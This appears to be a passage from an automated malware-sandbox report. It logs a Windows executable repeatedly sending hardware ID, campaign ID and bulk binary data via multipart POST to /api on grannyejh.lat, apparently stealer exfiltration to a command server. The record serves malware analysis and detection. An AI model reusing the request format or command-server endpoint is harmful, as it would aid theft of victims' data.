                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 31 35 6f 44 31 2b 6e 66 66 76 65 2b 71 71 4e 34 4e 72 76 4b 6a 51 4b 50 36 45 4b 49 72 32 36 67 5a 32 2b 6b 59 2b 59 52 77 6f 48 66 7a 45 44 62 31 4e 39 71 34 34 65 43 6d 54 6b 59 6e 2b 71 77 52 6f 58 50 46 34 54 62 5a 76 41 75 58 65 6b 6e 35 6d 44 4d 78 34 66 55 53 4e 57 68 32 48 57 74 32 4d 54 61 4c 32 58 76 68 39 70 57 74 6f 59 62 68 76 6b 68 75 47 30 59 70 44 6e 6d 64 73 79 47 78 4a 34 4b 6e 65 4c 4b 5a 36 71 2b 71 71 39 36 4e 37 33 47 6d 68 4f 6d 39 6a 7a 54 37 47 2f 75 4f 45 44 31 61 2b 68 75 67 34 47 66 74 56 6a 54 6f 65 4d 71 72 5a 6a 55 30 44 51 46 76 39 36 45 41 37 2f 5a 54 2b 48 68 5a 75 45 70 52 76 4d 6b 35 6d 44 4d 78 34 66 55 53 74 57 68 32 48 57 74 32 4d 54 61 4c 32 58 76 68 39 70 57 74 6f 59 62 68 76 6b 68 75 47 30 59 70 44 6e 6d 64 73 79
                                                                                                                Data Ascii: 15oD1+nffve+qqN4NrvKjQKP6EKIr26gZ2+kY+YRwoHfzEDb1N9q44eCmTkYn+qwRoXPF4TbZvAuXekn5mDMx4fUSNWh2HWt2MTaL2Xvh9pWtoYbhvkhuG0YpDnmdsyGxJ4KneLKZ6q+qq96N73GmhOm9jzT7G/uOED1a+hug4GftVjToeMqrZjU0DQFv96EA7/ZT+HhZuEpRvMk5mDMx4fUStWh2HWt2MTaL2Xvh9pWtoYbhvkhuG0YpDnmdsy
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 4e 57 68 30 43 53 31 77 4a 57 43 5a 44 32 7a 31 38 59 44 73 38 39 43 69 4b 39 76 6f 47 63 57 35 53 47 32 49 34 50 47 69 34 6f 57 6c 61 48 44 4b 76 54 41 67 73 67 73 59 2f 4b 51 6d 45 54 78 69 45 58 46 2f 58 50 6d 50 45 44 6e 62 4a 67 51 6f 64 50 41 6e 42 76 5a 30 4e 46 67 2b 35 57 58 6d 48 4d 4f 67 76 32 59 41 37 6e 4c 51 50 66 35 59 75 41 78 55 61 52 6c 35 6a 62 4d 6d 59 65 68 43 70 7a 78 33 79 53 6a 77 4a 6a 49 4c 48 43 78 77 6f 30 55 71 6f 51 46 33 4f 67 68 2f 33 46 50 70 44 33 6d 64 74 2b 50 68 35 35 59 77 36 47 62 61 75 43 42 6c 34 5a 33 49 71 37 57 69 52 4b 71 6a 7a 7a 34 77 6e 50 6e 4c 31 57 6d 47 71 73 71 6d 74 54 45 6e 42 2b 6c 33 2f 46 32 36 70 43 58 79 6c 67 33 73 64 79 30 4f 70 37 5a 42 64 61 74 52 2b 4d 70 56 61 52 6c 35 6a 62 4d 6d 59 65 68
                                                                                                                Data Ascii: NWh0CS1wJWCZD2z18YDs89CiK9voGcW5SG2I4PGi4oWlaHDKvTAgsgsY/KQmETxiEXF/XPmPEDnbJgQodPAnBvZ0NFg+5WXmHMOgv2YA7nLQPf5YuAxUaRl5jbMmYehCpzx3ySjwJjILHCxwo0UqoQF3Ogh/3FPpD3mdt+Ph55Yw6GbauCBl4Z3Iq7WiRKqjzz4wnPnL1WmGqsqmtTEnB+l3/F26pCXylg3sdy0Op7ZBdatR+MpVaRl5jbMmYeh


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.949728104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:39 UTC276OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=PAPFBR4QJTLV5VS
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 12827
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:39 UTC12827OUTData Raw: 2d 2d 50 41 50 46 42 52 34 51 4a 54 4c 56 35 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 41 50 46 42 52 34 51 4a 54 4c 56 35 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 41 50 46 42 52 34 51 4a 54 4c 56 35 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 50 41 50 46 42
                                                                                                                Data Ascii: --PAPFBR4QJTLV5VSContent-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--PAPFBR4QJTLV5VSContent-Disposition: form-data; name="pid"2--PAPFBR4QJTLV5VSContent-Disposition: form-data; name="lid"PsFKDg--pablo--PAPFB
                                                                                                                2024-12-19 07:36:40 UTC1116INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=c5t6algjp811j91v3lcuo964id; expires=Mon, 14 Apr 2025 01:23:18 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JMWuRdIhaayhmZL3V6AYmBEgokIm5SPyPJSl0fIqVd1nCmc3SqVLbhQoYVoYNYxMeE9hd2Yg%2BcuipnRJpeqAD5oVz6Eli8UHVYdHbEXFbcrlHWiKvzWGSFywbJmmyvLx"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b90e199f41c0-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=11&recv=18&lost=0&retrans=1&sent_bytes=4202&recv_bytes=13761&delivery_rate=258635&cwnd=210&unsent_bytes=0&cid=3d0591fff7c764ee&ts=983&x=0"
                                                                                                                2024-12-19 07:36:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-19 07:36:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.949734104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:41 UTC274OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=J0AX77C9TIVJ7
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 15033
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:41 UTC15033OUTData Raw: 2d 2d 4a 30 41 58 37 37 43 39 54 49 56 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 30 41 58 37 37 43 39 54 49 56 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 30 41 58 37 37 43 39 54 49 56 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4a 30 41 58 37 37 43 39 54 49 56
                                                                                                                Data Ascii: --J0AX77C9TIVJ7Content-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--J0AX77C9TIVJ7Content-Disposition: form-data; name="pid"2--J0AX77C9TIVJ7Content-Disposition: form-data; name="lid"PsFKDg--pablo--J0AX77C9TIV
                                                                                                                2024-12-19 07:36:42 UTC1123INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:42 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=v5rasbd3snnmrq88qu8ltba16i; expires=Mon, 14 Apr 2025 01:23:21 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xi12Di2CoTR1sbW2Rr4kCuDXzQlZB5TkYfnS7jsJwNtKiXdGeb8%2BuycDFgI9AGpNTnhSd3zGzejch4HSZL5VLLB0XqbQBvau1woJpbP%2Fh%2BgJU5ZF8bUD4cw%2BgCeWH00C"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b91c6a4d728d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1818&rtt_var=685&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2829&recv_bytes=15965&delivery_rate=1592148&cwnd=234&unsent_bytes=0&cid=ab1ce6bc231c1278&ts=875&x=0"
                                                                                                                2024-12-19 07:36:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-19 07:36:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.949742104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:43 UTC280OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=PEPULYB9QC75IWHJ1QG
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20585
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:43 UTC15331OUTData Raw: 2d 2d 50 45 50 55 4c 59 42 39 51 43 37 35 49 57 48 4a 31 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 45 50 55 4c 59 42 39 51 43 37 35 49 57 48 4a 31 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 45 50 55 4c 59 42 39 51 43 37 35 49 57 48 4a 31 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                Data Ascii: --PEPULYB9QC75IWHJ1QGContent-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--PEPULYB9QC75IWHJ1QGContent-Disposition: form-data; name="pid"3--PEPULYB9QC75IWHJ1QGContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                2024-12-19 07:36:43 UTC5254OUTData Raw: 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: B-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                                                                2024-12-19 07:36:44 UTC1122INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:44 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=il92dl83r8l2jpv1b30eet2hic; expires=Mon, 14 Apr 2025 01:23:23 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znn8hOvaLne0zBzWJMgCCXi5d%2FSeH75tnlNGf90cSTO1qb8urc1nrCGWX0Nx9ypX62HFSvLDxZKY8HIWj9zMszLwQpyFGMCD0H%2FKmGqYTG2i97fmER66UjCsm7%2FYQwbB"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b92a8dc44258-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1574&rtt_var=607&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21545&delivery_rate=1776155&cwnd=181&unsent_bytes=0&cid=cf1da25fbb35ff0a&ts=1013&x=0"
                                                                                                                2024-12-19 07:36:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-19 07:36:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.949749104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:46 UTC271OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=XEG88966N4N
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1180
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:46 UTC1180OUTData Raw: 2d 2d 58 45 47 38 38 39 36 36 4e 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 45 47 38 38 39 36 36 4e 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 45 47 38 38 39 36 36 4e 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 45 47 38 38 39 36 36 4e 34 4e 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: --XEG88966N4NContent-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--XEG88966N4NContent-Disposition: form-data; name="pid"1--XEG88966N4NContent-Disposition: form-data; name="lid"PsFKDg--pablo--XEG88966N4NCont
                                                                                                                2024-12-19 07:36:47 UTC1116INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=8lje20a5qfapl26f5fhp87moog; expires=Mon, 14 Apr 2025 01:23:26 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqK5fwho7xWrAPvLYgtOB5eLoU6ZqPnxQ4GYjmjDfqUzIU7Q0CDR8c3LbF7s64lsnh%2FNjhDrcMkuf2haOc2DEVADftucm%2BS1mRb4YdaRUaPG352Ujxcq5vZHfqNYAqV1"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b93c3b8e43ef-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2353&min_rtt=2348&rtt_var=891&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2087&delivery_rate=1221246&cwnd=237&unsent_bytes=0&cid=423d71baf009e616&ts=870&x=0"
                                                                                                                2024-12-19 07:36:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-19 07:36:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.949758104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:49 UTC279OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=1B66W53CLPJIG2NL2
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 584873
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: 2d 2d 31 42 36 36 57 35 33 43 4c 50 4a 49 47 32 4e 4c 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 42 36 36 57 35 33 43 4c 50 4a 49 47 32 4e 4c 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 42 36 36 57 35 33 43 4c 50 4a 49 47 32 4e 4c 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                Data Ascii: --1B66W53CLPJIG2NL2Content-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--1B66W53CLPJIG2NL2Content-Disposition: form-data; name="pid"1--1B66W53CLPJIG2NL2Content-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: 18 92 c7 a3 27 4f 2d 4e e9 b8 20 ae ae c3 a2 36 3d a2 76 c5 61 19 cd ce 1a 27 16 24 b2 6e d6 dd 38 e5 c3 34 9b 6a da d6 b1 78 ff 3b 88 8e 0a 7e 06 99 e3 49 b2 11 51 f0 0c ea c4 dd e6 80 5d 5b 0c 4c 83 26 96 77 4b aa c9 0c 83 f8 9d 5b 62 a4 cb 10 69 fd 74 df b5 73 c4 de 43 d1 b0 af c8 0c 2f 83 89 6a 9d 58 13 ec 29 1c 8a 64 f2 93 54 74 26 0d 00 c6 e6 78 19 fe 14 85 96 76 fa 71 ea 71 63 15 c2 39 f3 1c 41 ea ec 86 22 a3 de 93 12 76 07 1b ca 8d 92 86 28 48 da 6f 9c e2 52 44 cb fd f4 88 26 f0 6d 4a 65 bd 43 25 27 58 85 19 f7 29 54 b3 bc c5 8f 61 d0 a6 f0 e1 9c 93 1e 58 92 ec cb 4a 8f 73 f9 db fb 71 85 40 12 bf 5a c2 0d 43 ac af 4e 6f 8a 9a 33 69 12 75 98 d5 e9 51 ce 2d 28 7f 56 ab 5c 9b 9e bc 58 b7 c3 34 12 c9 4e 43 51 fc 30 97 74 9a 03 c3 0a fb 61 6e 81 e9 6f
                                                                                                                Data Ascii: 'O-N 6=va'$n84jx;~IQ][L&wK[bitsC/jX)dTt&xvqqc9A"v(HoRD&mJeC%'X)TaXJsq@ZCNo3iuQ-(V\X4NCQ0tano
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: b9 98 8b 76 d9 bb 8c d0 9f 31 69 04 a7 9f 99 5d 9a f2 a2 7e ab 31 de 4b 61 8a 05 31 29 1e c2 49 8f 7c 0f 56 bb e5 57 24 57 7c b4 4e 77 8a a4 7b b4 71 9f 63 0e b8 55 89 9f bb bd f8 9f 80 dd 5f b7 3e e1 4f fe 24 2d 0e 8f f5 8a 2e 62 e2 75 c1 54 8d 18 f6 d9 e7 2b de 7c 78 19 e5 4e 1b 34 cc 3d 7d 07 8d eb 81 18 d6 8e 72 ea 1b eb 63 df b1 9b bd 0f 9e ed 9a 0e 4a b5 05 86 1f ff b6 c7 60 bc fb 56 ea c7 92 25 c3 fc 4c 5c d4 f9 5b 6d 6f cf f1 61 8f 29 bb c7 da 45 8a e2 2e 69 96 f7 f2 92 f8 c5 89 18 30 77 62 9e 51 77 90 72 0c 2e 10 a5 ea a4 d8 22 59 fa ef 67 1f f1 a2 b4 7a 9f d8 bf 13 8b b0 7c 98 65 48 35 78 93 53 9d 95 fe a5 9b de ea 13 3d 7b f5 fd e2 1b 99 cd d3 c3 4f 46 78 ee 51 aa 6e 53 a8 15 8c 7c ee d2 03 33 eb 1e 87 79 50 db d2 94 3a da 6e c1 81 4b 56 87 40
                                                                                                                Data Ascii: v1i]~1Ka1)I|VW$W|Nw{qcU_>O$-.buT+|xN4=}rcJ`V%L\[moa)E.i0wbQwr."Ygz|eH5xS={OFxQnS|3yP:nKV@
                                                                                                                2024-12-19 07:36:49 UTC15331OUTData Raw: 94 27 1d c5 72 d3 c5 b8 51 d2 7c ed 59 5c ae 7a 90 e0 a8 a7 02 9b 3b 39 3d 36 ac 9c 08 70 c3 d2 df ae 8c 6f e0 c2 a3 85 6e 4c 1f 2e dc 9a 73 e3 1b 31 d2 df 8a ba e8 a3 4f ef 2b 78 14 7a 6f d6 33 66 65 7f df a6 c0 7e ba 10 b6 f8 09 fb 46 72 75 27 9f ab 9e d0 de c8 9d db b3 fb 2d f9 d1 69 1c 92 eb 96 2b f5 30 14 69 12 8c 38 77 3f 9c e9 2b e4 f5 14 b4 aa 86 db 9b c8 2f 3a e1 6d 54 70 43 9b 8e b0 27 69 ed d2 81 c1 be ef 7c f8 b2 e1 74 3b 0e 8d 63 a3 b5 30 aa b5 55 f8 9a 96 7a 74 8f 02 b9 b0 d6 98 f5 d1 6f cb 58 3d 28 6c 6b e5 db 55 cb 44 2b 21 d2 a9 41 24 d5 1c 06 8b 97 07 17 b1 7a 72 30 a2 a1 26 69 df 5d d3 4b 67 18 67 13 8f 80 5e 11 f4 29 6b 32 d9 16 d8 9a 12 73 af a8 44 ee 7d 27 20 77 08 cc 1a 8e 6c de be ce 07 ca 34 63 4f 24 45 96 ef 0e 82 83 fd 42 40 00
                                                                                                                Data Ascii: 'rQ|Y\z;9=6ponL.s1O+xzo3fe~Fru'-i+0i8w?+/:mTpC'i|t;c0UztoX=(lkUD+!A$zr0&i]Kgg^)k2sD}' wl4cO$EB@
